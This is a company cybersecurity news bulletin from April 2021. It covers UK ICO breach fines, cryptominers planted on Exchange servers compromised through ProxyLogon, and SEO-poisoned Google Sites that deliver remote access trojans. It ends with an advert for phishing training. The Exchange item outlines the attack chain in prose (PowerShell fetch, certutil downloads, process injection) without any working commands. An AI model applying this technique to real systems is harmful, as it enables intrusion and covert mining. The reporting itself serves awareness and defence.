Neu Cyber Threats – 22nd April 2021
The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).
The largest fine was handed to British Airways with just over half of the £42.41m total being paid by the airline, following a 2018 cyber attack which saw over half a million of its customers’ details stolen by cyber criminals.
The news highlights the need for businesses to improve their data management policies and secure the data they hold correctly. With the COVID-19 pandemic, many companies might have prioritised other areas of their business, forgetting about improvements to their cyber security measures. Read more on the story and what to be aware of, here.
Microsoft Exchange servers have again been targeted, this time by cyber criminals to host malicious Monero cryptominer in an “unusual attack”. This latest hit to the Exchange servers follows the recent infamous ProxyLogon exploit.
It has been discovered that the threat actors were able to compromise the Exchange servers using the exploit —which suffered a whole range of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to webshells -to host Monero cryptomining malware.
The attack began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.
A script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, before deleting any evidence that it was there. The attack’s executable appears to contain a modified version of a tool publicly available called PEx64-Injector, which is described as having the ability to migrate files without requiring any administrator privileges. Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the system’s files. It configures the miner, injects it into a running process, then exits, with the damage done and running on the system.
Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although, the attacker lost several servers after this date and the overall activity from the miner decreased, other servers that were gained more than made up for the early losses. The ProxyLogon problem started for Microsoft in early March when the company said it has spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange server. The four flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials – giving them access to email communications and the ability to install a web shell for further exploitation within the environment.
While Microsoft have already released an out-of-band update, with the company confirming that 92% of affected machines had been patched, much damage has already been done to businesses whose Exchange servers were affected by the issue, there still will be unpatched systems that remain vulnerable out there.
Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.
Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.
Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.
Cyber criminals use Google search re-direction and drive-by-download tactics to direct unsuspecting victims to the RAT— typically a person who visits the infected site simply executes a binary disguised as a PDF by clicking on a purported “form” — thus infecting his or her machine. This is an increasingly common trend with malware delivery, which speaks to the improved security of applications such as browsers that handle vulnerable code. Unfortunately, it reveals a glaring blind spot in controls, which allows users to execute untrusted binaries or script files at will.
The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.
One recent incident was observed by researchers, in which a victim working in the financial industry was searching for a free version of a document online and was re-directed via Google Search to a Google sites page that was under the control of threat actors and included an embedded download button. It’s clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.
Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.
Neuways advises employees to consider what type of business forms, invoices, receipts etc, they use search for online. Through sharing this type of form on a centralised system such as Microsoft SharePoint, colleagues can share documents such as this, and avoid falling into sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or firstname.lastname@example.org to discuss your options with us.